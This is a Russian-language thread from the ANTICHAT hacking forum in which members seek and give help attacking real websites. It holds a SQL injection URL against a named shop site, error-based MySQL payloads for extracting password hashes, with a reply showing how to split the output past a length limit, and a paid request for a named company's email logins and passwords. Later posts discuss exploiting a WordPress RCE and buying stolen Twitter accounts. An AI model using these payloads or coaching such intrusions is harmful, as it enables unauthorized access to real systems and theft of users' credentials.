HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.01.2014, 23:35
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от Xvir  
Xvir said:
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('PrValues','SAP_Param5'))--
 
Ответить с цитированием

  #2  
Старый 09.01.2014, 18:04
Xvir
Guest
Сообщений: n/a
Провел на форуме:
4378

Репутация: 0
По умолчанию

Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
 
Ответить с цитированием

  #3  
Старый 09.01.2014, 20:56
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

Привет всем!)

Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "

Цитата:
Сообщение от None  
and extractvalue(rand(),concat(0x3a,(select concat(0x3a,pass) from server.users limit 1,1))))--
"

Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
 
Ответить с цитированием

  #4  
Старый 09.01.2014, 21:26
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

Да. но скрипт Hash Id эго тип хеша определить не может.

Цитата:
Сообщение от None  
46f94c8de14fb36680850768ff1b7f2
 
Ответить с цитированием

  #5  
Старый 09.01.2014, 21:42
Unknown
Guest
Сообщений: n/a
Провел на форуме:
8396

Репутация: 6
По умолчанию

Цитата:
Сообщение от Massay  
Massay said:
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--

and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--

Цитата:
Сообщение от K800  
K800 said:
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
 
Ответить с цитированием

  #6  
Старый 09.01.2014, 21:55
Massay
Guest
Сообщений: n/a
Провел на форуме:
4404

Репутация: 0
По умолчанию

Спасибо большое!!!
 
Ответить с цитированием

  #7  
Старый 10.01.2014, 21:04
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Как использовать эту уязвимость ? http://vagosec.org/2013/12/wordpress-rce-exploit/
 
Ответить с цитированием

  #8  
Старый 11.01.2014, 00:42
websheff
Guest
Сообщений: n/a
Провел на форуме:
953

Репутация: 0
По умолчанию

Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
 
Ответить с цитированием

  #9  
Старый 11.01.2014, 01:08
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от websheff  
websheff said:
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
 
Ответить с цитированием

  #10  
Старый 11.01.2014, 01:48
websheff
Guest
Сообщений: n/a
Провел на форуме:
953

Репутация: 0
По умолчанию

Цитата:
Сообщение от kingbeef  
kingbeef said:
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ